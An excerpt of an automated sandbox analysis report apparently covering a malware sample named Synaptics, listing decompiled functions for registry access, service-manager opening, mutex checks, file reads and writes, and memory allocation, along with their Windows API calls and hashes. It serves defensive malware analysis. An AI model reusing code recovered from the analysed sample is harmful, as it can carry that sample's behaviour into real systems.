				if(_v6 != 0) {
					if(((_t43 & 0xffffff00 |  *((intOrPtr*)(_t78 + 4)) != 0x00000000) & _t63) != 0) {
						_push( *((intOrPtr*)(_t78 + 0x10)));
						_push(E00432018);
						_push(_v16);
						E00404D40();
					}
					E00431EC0(_t78, _v16, _v12);
				}
				_pop(_t72);
				 *[fs:eax] = _t72;
				_push(E00432004);
				return E004049C0( &_v16);
			}















                                                                                                                                                                                                                            0x00431f02
                                                                                                                                                                                                                            0x00431f05
                                                                                                                                                                                                                            0x00431f0a
                                                                                                                                                                                                                            0x00431f0e
                                                                                                                                                                                                                            0x00431f0f
                                                                                                                                                                                                                            0x00431f14
                                                                                                                                                                                                                            0x00431f17
                                                                                                                                                                                                                            0x00431f1f
                                                                                                                                                                                                                            0x00431f2c
                                                                                                                                                                                                                            0x00431f30
                                                                                                                                                                                                                            0x00431f3f
                                                                                                                                                                                                                            0x00431f3f
                                                                                                                                                                                                                            0x00431f46
                                                                                                                                                                                                                            0x00431f4d
                                                                                                                                                                                                                            0x00431f62
                                                                                                                                                                                                                            0x00431f72
                                                                                                                                                                                                                            0x00431f79
                                                                                                                                                                                                                            0x00431f7f
                                                                                                                                                                                                                            0x00431f96
                                                                                                                                                                                                                            0x00431fa6
                                                                                                                                                                                                                            0x00431fad
                                                                                                                                                                                                                            0x00431fad
                                                                                                                                                                                                                            0x00431fb5
                                                                                                                                                                                                                            0x00431fc0
                                                                                                                                                                                                                            0x00431fc2
                                                                                                                                                                                                                            0x00431fc5
                                                                                                                                                                                                                            0x00431fca
                                                                                                                                                                                                                            0x00431fd5
                                                                                                                                                                                                                            0x00431fd5
                                                                                                                                                                                                                            0x00431fe2
                                                                                                                                                                                                                            0x00431fe2
                                                                                                                                                                                                                            0x00431fe9
                                                                                                                                                                                                                            0x00431fec
                                                                                                                                                                                                                            0x00431fef
                                                                                                                                                                                                                            0x00431ffc

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00431FFD,?,?,00000001), ref: 00431F72
                                                                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00431FFD,?,?,00000001), ref: 00431FA6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateOpen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 436179556-0
                                                                                                                                                                                                                            • Opcode ID: e1a5a51a70a2a78c8410cf28fc2fe6ab7f94f755bea54f4d5c90a32333cb09bd
                                                                                                                                                                                                                            • Instruction ID: b4c976e95b02fa110a8c934fabbdb83e4f1344f95f7529043488b7411d694942
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1a5a51a70a2a78c8410cf28fc2fe6ab7f94f755bea54f4d5c90a32333cb09bd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6317371A042087FDB11EBA5D842BDFB7B9EF48304F10857AF914E3291DB799E098758
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402FE0 Relevance: 3.1, APIs: 2, Instructions: 60fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402FE0(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
				long _v8;
				void** _t48;
				signed int _t49;
				signed int _t58;

				_t58 = _t49;
				_t48 = __eax;
				if(_a12 != (__eax[1] & 0x0000ffff & _a12)) {
					E004028E4(0x67);
					_v8 = 0;
				} else {
					if(WriteFile( *__eax, __edx, __eax[2] * _t58,  &_v8, 0) != 0) {
						_v8 = _v8 /  *(_t48 + 8);
						if(_a16 == 0) {
							if(_t58 != _v8) {
								E004028E4(_a4);
								_v8 = 0;
							}
						} else {
							 *_a16 = _v8;
						}
					} else {
						E004028E4(GetLastError());
						_v8 = 0;
					}
				}
				return _v8;
			}







                                                                                                                                                                                                                            0x00402fe7
                                                                                                                                                                                                                            0x00402feb
                                                                                                                                                                                                                            0x00402ff8
                                                                                                                                                                                                                            0x00403057
                                                                                                                                                                                                                            0x0040305e
                                                                                                                                                                                                                            0x00402ffa
                                                                                                                                                                                                                            0x0040300f
                                                                                                                                                                                                                            0x0040302a
                                                                                                                                                                                                                            0x00403032
                                                                                                                                                                                                                            0x00403041
                                                                                                                                                                                                                            0x00403046
                                                                                                                                                                                                                            0x0040304d
                                                                                                                                                                                                                            0x0040304d
                                                                                                                                                                                                                            0x00403034
                                                                                                                                                                                                                            0x0040303a
                                                                                                                                                                                                                            0x0040303a
                                                                                                                                                                                                                            0x00403011
                                                                                                                                                                                                                            0x00403016
                                                                                                                                                                                                                            0x0040301d
                                                                                                                                                                                                                            0x0040301d
                                                                                                                                                                                                                            0x0040300f
                                                                                                                                                                                                                            0x00403069

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00403085,00000065,00402FD8,0000D7B2,?,?), ref: 0040300A
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00403085,00000065,00402FD8,0000D7B2,?,?,?,00474E3F,00000000,00000000,00474E74), ref: 00403011
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 442123175-0
                                                                                                                                                                                                                            • Opcode ID: 0d69c125084957f3b94c88cdf34e0184f0e2678b999d60466521ef1ad3156c2d
                                                                                                                                                                                                                            • Instruction ID: dacf0affb31a298fea10ec7efa56baaddcddd91d2a84db1d45905dc1d19b3bb0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d69c125084957f3b94c88cdf34e0184f0e2678b999d60466521ef1ad3156c2d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D113071A01108EFDB44DF69C940A9ABBECEF48311B108477A808F7285E674DE009765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004738BC Relevance: 3.0, APIs: 2, Instructions: 38serviceCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E004738BC(char __eax, signed int __ebx) {
				char _v8;
				intOrPtr* _t11;
				void* _t14;
				intOrPtr _t25;
				intOrPtr _t28;

				_push(__ebx);
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t28);
				_push(0x473922);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				_t11 =  *0x49de34; // 0x49b0ec
				if( *_t11 == 2) {
					_t14 = OpenSCManagerA(E00404E80(_v8), 0, 0xf003f); // executed
					if((__ebx & 0xffffff00 | _t14 != 0x00000000) != 0) {
						CloseServiceHandle(_t14);
					}
				}
				_pop(_t25);
				 *[fs:eax] = _t25;
				_push(E00473929);
				return E004049C0( &_v8);
			}








                                                                                                                                                                                                                            0x004738c0
                                                                                                                                                                                                                            0x004738c1
                                                                                                                                                                                                                            0x004738c7
                                                                                                                                                                                                                            0x004738ce
                                                                                                                                                                                                                            0x004738cf
                                                                                                                                                                                                                            0x004738d4
                                                                                                                                                                                                                            0x004738d7
                                                                                                                                                                                                                            0x004738da
                                                                                                                                                                                                                            0x004738e2
                                                                                                                                                                                                                            0x004738f8
                                                                                                                                                                                                                            0x00473904
                                                                                                                                                                                                                            0x00473907
                                                                                                                                                                                                                            0x00473907
                                                                                                                                                                                                                            0x00473904
                                                                                                                                                                                                                            0x0047390e
                                                                                                                                                                                                                            0x00473911
                                                                                                                                                                                                                            0x00473914
                                                                                                                                                                                                                            0x00473921

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00473922,?,021E2354,?,?,0049A443), ref: 004738F8
                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,000F003F,00000000,00473922,?,021E2354,?,?,0049A443), ref: 00473907
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandleManagerOpenService
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1199824460-0
                                                                                                                                                                                                                            • Opcode ID: 3971470c61dd45be730c7742b8a9d7523f2163cc16d5b139840d9d0ca77dbf79
                                                                                                                                                                                                                            • Instruction ID: 9747779068363641c57f556ad18b80e8a6fd65f6f560b6840aedc400607e3997
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3971470c61dd45be730c7742b8a9d7523f2163cc16d5b139840d9d0ca77dbf79
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7F0F0F0640308AFD701EB65DD03AAB7BECEB46701BA14477FA04A7292DA789E04E518
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00458384 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458384(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x49befc;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x49e668; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E0045843C(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}









                                                                                                                                                                                                                            0x00458388
                                                                                                                                                                                                                            0x00458396
                                                                                                                                                                                                                            0x00458399
                                                                                                                                                                                                                            0x0045839e
                                                                                                                                                                                                                            0x004583a3
                                                                                                                                                                                                                            0x004583a6
                                                                                                                                                                                                                            0x004583b0
                                                                                                                                                                                                                            0x004583ba
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004583b2
                                                                                                                                                                                                                            0x004583b2
                                                                                                                                                                                                                            0x004583b2
                                                                                                                                                                                                                            0x004583b2
                                                                                                                                                                                                                            0x004583c0
                                                                                                                                                                                                                            0x004583cb
                                                                                                                                                                                                                            0x004583d0
                                                                                                                                                                                                                            0x004583d1
                                                                                                                                                                                                                            0x004583d4
                                                                                                                                                                                                                            0x004583dd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CursorLoad
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3238433803-0
                                                                                                                                                                                                                            • Opcode ID: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                                                                                                                                                                                            • Instruction ID: e70e3c34bb26c70f92347ae4735de209fc646f551b3d90022d55a82ec6438589
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFF08261B04204579A20563E5CC1A7E7288DBD6B36B60033FFD39E77D2CF2E6C46425A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402CC2 Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402CC2(void** __eax) {
				int _t13;
				long _t15;

				__eax[4] = 0;
				__eax[3] = 0;
				_t13 = ReadFile( *__eax, __eax[5], __eax[2],  &(__eax[4]), 0); // executed
				if(_t13 != 0) {
					return 0;
				}
				_t15 = GetLastError();
				if(_t15 != 0x6d) {
					return _t15;
				} else {
					return 0;
				}
			}





                                                                                                                                                                                                                            0x00402cc9
                                                                                                                                                                                                                            0x00402cce
                                                                                                                                                                                                                            0x00402ce2
                                                                                                                                                                                                                            0x00402ce9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402cf9
                                                                                                                                                                                                                            0x00402ceb
                                                                                                                                                                                                                            0x00402cf3
                                                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                                                            0x00402cf5
                                                                                                                                                                                                                            0x00402cf8
                                                                                                                                                                                                                            0x00402cf8

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402CE2
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00402CEB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileLastRead
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1948546556-0
                                                                                                                                                                                                                            • Opcode ID: 2722b77db616b9ec834f1696af52551899f9073d62fedd3e8687356533fa5bef
                                                                                                                                                                                                                            • Instruction ID: 4e4afa64d6ce4905370910369685084fd00da3edce78af6e671044812be54073
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2722b77db616b9ec834f1696af52551899f9073d62fedd3e8687356533fa5bef
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4E075B16142005FEF80DEB989C0A5777DCAB08214B0448B6B908DA286E278D8509B25
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409A90 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409A90(void* __eax, long __edx) {
				int _t4;
				long _t7;

				_t7 = 0;
				_t4 = SetFileAttributesA(E00404E80(__eax), __edx); // executed
				if(_t4 == 0) {
					_t7 = GetLastError();
				}
				return _t7;
			}





                                                                                                                                                                                                                            0x00409a97
                                                                                                                                                                                                                            0x00409aa2
                                                                                                                                                                                                                            0x00409aa9
                                                                                                                                                                                                                            0x00409ab0
                                                                                                                                                                                                                            0x00409ab0
                                                                                                                                                                                                                            0x00409ab7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,?,00000000,00476826,?,00476888,?,00476888,00000000,00000000,0000000A,KBHKS,?,00476888), ref: 00409AA2
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000006,00000000,?,00000000,00476826,?,00476888,?,00476888,00000000,00000000,0000000A,KBHKS,?,00476888), ref: 00409AAB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1799206407-0
                                                                                                                                                                                                                            • Opcode ID: 675699e61b058174247cfbc6a9f31fc6273980f5e3cf600b71198e92341230a6
                                                                                                                                                                                                                            • Instruction ID: a8da59a57bdf58849924320cc2d236a07249c13e055f30f78d96cafe0e5643bb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 675699e61b058174247cfbc6a9f31fc6273980f5e3cf600b71198e92341230a6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABD0C9627051202A961065FF2C8195B818D8ED55A9301427FBA08E3292E568DC0A01BA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409B6C Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409B6C(WORD* __eax) {
				int _t6;
				WORD* _t10;

				_t10 = __eax;
				_t6 = FindNextFileA( *(__eax + 0x14), __eax + 0x18); // executed
				if(_t6 == 0) {
					return GetLastError();
				} else {
					return E00409AB8(_t10);
				}
			}





                                                                                                                                                                                                                            0x00409b6d
                                                                                                                                                                                                                            0x00409b77
                                                                                                                                                                                                                            0x00409b7e
                                                                                                                                                                                                                            0x00409b8f
                                                                                                                                                                                                                            0x00409b80
                                                                                                                                                                                                                            0x00409b88
                                                                                                                                                                                                                            0x00409b88

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?,?,0047614C,?,004761F4,?), ref: 00409B77
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0047614C,?,004761F4,?), ref: 00409B89
                                                                                                                                                                                                                              • Part of subcall function 00409AB8: FileTimeToLocalFileTime.KERNEL32(?), ref: 00409AE5
                                                                                                                                                                                                                              • Part of subcall function 00409AB8: FileTimeToDosDateTime.KERNEL32 ref: 00409AF4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2103556486-0
                                                                                                                                                                                                                            • Opcode ID: 56d7e7a648cf0da11fd84696b73b02b24197c58a4e3c26e867bebf2357675fe8
                                                                                                                                                                                                                            • Instruction ID: 3ffd322738bc3e6d8a1a454ad62afb9dcd57891a573725529f03bbabbe8ea297
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56d7e7a648cf0da11fd84696b73b02b24197c58a4e3c26e867bebf2357675fe8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DC012A270010457CF04BEFA6CC1957229C1A482143800977BD00DA283EA3CEC5497A5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047423C Relevance: 2.5, APIs: 2, Instructions: 42COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                            			E0047423C(char __eax, void* __ebx, char __edx, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				void* _t13;
				intOrPtr _t25;
				void* _t27;
				void* _t30;

				_v9 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t30);
				_push(0x4742ac);
				_push( *[fs:eax]);
				 *[fs:eax] = _t30 + 0xfffffff8;
				_t13 = E00406F90(0, 0xffffffff, E00404E80(_v8)); // executed
				_t27 = _t13;
				if(GetLastError() != 0xb7) {
					if(_t27 != 0 && _v9 == 0) {
						CloseHandle(_t27);
					}
				}
				_pop(_t25);
				 *[fs:eax] = _t25;
				_push(E004742B3);
				return E004049C0( &_v8);
			}









                                                                                                                                                                                                                            0x00474244
                                                                                                                                                                                                                            0x00474247
                                                                                                                                                                                                                            0x0047424d
                                                                                                                                                                                                                            0x00474254
                                                                                                                                                                                                                            0x00474255
                                                                                                                                                                                                                            0x0047425a
                                                                                                                                                                                                                            0x0047425d
                                                                                                                                                                                                                            0x0047426f
                                                                                                                                                                                                                            0x00474274
                                                                                                                                                                                                                            0x00474280
                                                                                                                                                                                                                            0x00474288
                                                                                                                                                                                                                            0x00474291
                                                                                                                                                                                                                            0x00474291
                                                                                                                                                                                                                            0x00474288
                                                                                                                                                                                                                            0x00474298
                                                                                                                                                                                                                            0x0047429b
                                                                                                                                                                                                                            0x0047429e
                                                                                                                                                                                                                            0x004742ab

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00406F90: CreateMutexA.KERNEL32(?,004742AD,004742AC,?,00474274,00000000,000000FF,00000000,00000000,004742AC), ref: 00406FA6
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,000000FF,00000000,00000000,004742AC,?,?,021E2354), ref: 00474276
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,00000000,004742AC,?,?,021E2354), ref: 00474291
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4294037311-0
                                                                                                                                                                                                                            • Opcode ID: 4160aa1df04b9819d5f377a9b135ecbcdee02ee1817cb19089dfddf0ff975d72
                                                                                                                                                                                                                            • Instruction ID: 318a60ea147540a6397c20476c41d700bab3d71984a2db83ba3ffa28fcbaf965
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4160aa1df04b9819d5f377a9b135ecbcdee02ee1817cb19089dfddf0ff975d72
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF0F970908204AEDB11EAE59903AAF77DC9B95364F1242BBF808B22D2DB7C5D10819E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004015B4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004015B4(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401468(0x49e5ec, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                                                                                                                                                                            0x004015b7
                                                                                                                                                                                                                            0x004015c1
                                                                                                                                                                                                                            0x004015d0
                                                                                                                                                                                                                            0x004015c3
                                                                                                                                                                                                                            0x004015c3
                                                                                                                                                                                                                            0x004015c3
                                                                                                                                                                                                                            0x004015d6
                                                                                                                                                                                                                            0x004015e3
                                                                                                                                                                                                                            0x004015e8
                                                                                                                                                                                                                            0x004015ea
                                                                                                                                                                                                                            0x004015ee
                                                                                                                                                                                                                            0x004015f7
                                                                                                                                                                                                                            0x004015fe
                                                                                                                                                                                                                            0x0040160a
                                                                                                                                                                                                                            0x00401611
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00401611
                                                                                                                                                                                                                            0x004015fe
                                                                                                                                                                                                                            0x00401616

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018BD), ref: 004015E3
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018BD), ref: 0040160A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
